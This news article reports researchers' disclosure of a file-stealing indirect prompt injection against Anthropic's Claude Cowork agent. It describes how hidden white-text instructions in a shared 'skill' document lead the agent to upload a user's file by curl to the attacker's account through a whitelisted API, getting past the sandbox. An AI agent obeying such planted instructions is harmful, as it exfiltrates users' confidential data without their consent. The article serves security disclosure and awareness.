Claude Cowork hit with file-stealing prompt injection days after Anthropic's launch

Jan 17, 2026

Nano Banana Pro prompted by THE DECODER

Just days after Anthropic unveiled Claude Cowork, security researchers documented a critical vulnerability that lets attackers steal confidential user files through hidden prompt injections, a well-known issue of AI systems.

Anthropic's new agentic AI system Claude Cowork is vulnerable to file exfiltration through indirect prompt injection, according to security researchers at PromptArmor. They documented the flaw just two days after the Research Preview went live.

The vulnerability stems from an isolation flaw in Claude's code execution environment that was already known before Cowork existed. According to PromptArmor, security researcher Johann Rehberger had previously identified and disclosed the issue in Claude.ai chat. Anthropic acknowledged the problem but allegedly never fixed it.

Malicious commands hide in plain sight

The attack chain PromptArmor documented starts when a user connects Cowork to a local folder containing confidential data. The attacker then gets a file with a hidden prompt injection into that folder.

The technique is particularly sneaky: attackers can hide the injection in a .docx file disguised as a harmless "skill" document, a new prompt method for agentic AI systems that Anthropic just introduced. Skill files are already being shared online, so users should be cautious about downloading them from untrusted sources.

The malicious text uses 1-point font, white color on a white background, and 0.1 line spacing, making it virtually invisible to human eyes.

A "skill" document uploaded by the user hides a prompt injection in plain sight. | Image: PromptArmor

When the user asks Cowork to analyze their files using the uploaded "skill," the injection takes over. It tells Claude to run a curl command that sends the largest available file to Anthropic's File Upload API using the attacker's API key. The file lands in the attacker's Anthropic account, where they can access it at will. No human authorization is needed at any point.

The prompt injection manipulates Claude into running a cURL request that uploads a credit estimate to the attacker's Anthropic account. | Image: PromptArmor

PromptArmor first ran the demonstration against Claude Haiku, Anthropic's weakest model. But even Claude Opus 4.5, the company's most capable model, fell for manipulation. In one test, a user uploaded a malicious integration guide while developing an AI tool. Customer data was successfully exfiltrated through the whitelisted Anthropic API domain, bypassing the sandbox restrictions of the virtual machine running the code.

The researchers also found a potential denial of service bug: when Claude tries to read a file whose extension doesn't match its actual content, the API throws repeated errors in all subsequent chats within that conversation.

Anthropic had touted that Cowork was built in just a week and a half, written entirely by Claude Code, the AI tool that Cowork is based on. These newly discovered security flaws raise questions about whether security got enough attention during that rapid development.

Prompt injection remains an unsolved problem

Prompt injection attacks have plagued the AI industry for years. Despite ongoing efforts, no one has managed to prevent them or even significantly limit their impact. Even Anthropic's "most secure" model, Opus 4.5, remains highly vulnerable.

A tool like Cowork, which connects to your computer and numerous other data sources, creates many potential entry points. Unlike phishing attacks, which users can learn to spot, there's no way for ordinary people to defend against these exploits.

The case also highlights a fundamental tension in agentic AI systems: the more autonomy they have, the larger their attack surface becomes. Previous research has already shown this pattern.

AI News Without the Hype – Curated by Humans

As a THE DECODER subscriber, you get ad-free reading, our weekly AI newsletter, the exclusive "AI Radar" Frontier Report 6× per year, access to comments, and our complete archive.

AI news without the hype
Curated by humans.

Over 20 percent launch discount.
Read without distractions – no Google ads.
Access to comments and community discussions.
Weekly AI newsletter.
6 times a year: “AI Radar” – deep dives on key AI topics.
Up to 25 % off on KI Pro online events.
Access to our full ten-year archive.
Get the latest AI news from The Decoder.

Subscribe to The Decoder

Claude Cowork hit with file-stealing prompt injection days after Anthropic's launch

Malicious commands hide in plain sight

Prompt injection remains an unsolved problem

AI News Without the Hype – Curated by Humans

AI news without the hypeCurated by humans.

AI news without the hype
Curated by humans.